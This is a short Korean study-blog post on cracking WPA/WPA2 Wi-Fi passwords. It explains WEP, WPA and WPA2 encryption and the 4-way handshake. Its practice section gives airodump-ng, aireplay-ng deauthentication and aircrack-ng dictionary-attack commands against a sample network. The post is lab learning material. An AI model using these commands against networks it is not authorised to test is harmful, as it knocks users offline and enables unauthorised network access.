메모장 입니다2

무선랜해킹] WPA/WPA2 크랙 본문

Study/무선랜

무선랜해킹] WPA/WPA2 크랙

Wooum@n 2017. 5. 6. 02:19

1.분류


 1)WEP(Wired Equivalent Privacy)

->802.11의 초기 보안 프로토콜.

->고정키/RC4 암호화 사용.

->취약.


 2)WPA(WiFi Protected Access)

->802.11i 구현단계에서, 임시방안으로 사용되던 보안 프로토콜.

->동적키(TKIP)/RC4 사용 //하지만 AES도 사용가능하다고 함.


 3)WPA2(≒802.11i)

->WPA와 동일한 방식.

->동적키(AES-CCMP)/AES 사용 //TKIP도 사용가능.


*AES-CCMP

 :이 방식은 WPA2에서 사용하는 암호화 프로토콜이며, AES 암호화 알고리즘의 CCM Mode 를 기반으로 한다.

 CCM 모드란 Counter Mode + CBC 를 의미한다. Key 길이와 IV 길이는 128bit, 48bit 로서 TKIP 와 같다.

 TKIP 와 다른 점은 암호화 알고리즘에서 AES(고급 암호화 표준) 을 사용했다는 점이다. AES는 1997년 1월, 기존의 데이터 암호 표준인 DES를 대체할 보다 강력한 알고리즘을 찾기 위해 세계적인 공모를 통해 선정된 차세대 암호화 알고리즘이다. TKIP 에서 사용한 RC4 알고리즘은 키 스트림 암호화 인데 반해, AES 는 블록 암호화를 사용한 알고리즘이며, RC4 알고리즘보다 훨씬 강력하다. 따라서 WPA 에 비해 WPA2 가 더 강력한 보안을 제공한다고 할 수 있다.

 또한 TKIP 는 데이터 무결성과 데이터 인증을 위해 Michael(or MIC) 을 사용하지만, CCMP 에서는 CBC-MAC(The Cipher Block Chaining Message Authentication Code) 을 사용한다.


 4)비교




2.WPA/WPA2


 -인증 절차

1)802.11i


2)4-way Handshaking


->키 인증 절차에 사용되는 4-way handshake의 사전 공유키를 이용하여 크랙.

->사전공유키: PSK암호와 SSID를 이용해, 암호키 생성함수(PBKDF2)로 키가 생성됨.

>>PSK암호를 예상하여 사전공유키 생성 후 비교하는 방식.



-실습

1)4-way handshake 패킷 캡쳐

`airodump-ng --essid "UNICORN" --channel 6 --write crack wlan0mon`

:모니터링 및 로깅.

`aireplay-ng --deauth 1 -e "UNICORN" wlan0mon`

:인증해제 패킷을 전송

->해당 클라이언트는 AP에 재연결을 시도(4-way handshake)


2)예상 패스워드 목록파일과 4way-handshake 캡쳐파일을 이용하여 크랙.

`aircrack-ng crack-01.cap -w password.lst`


3)결과



 ㅅ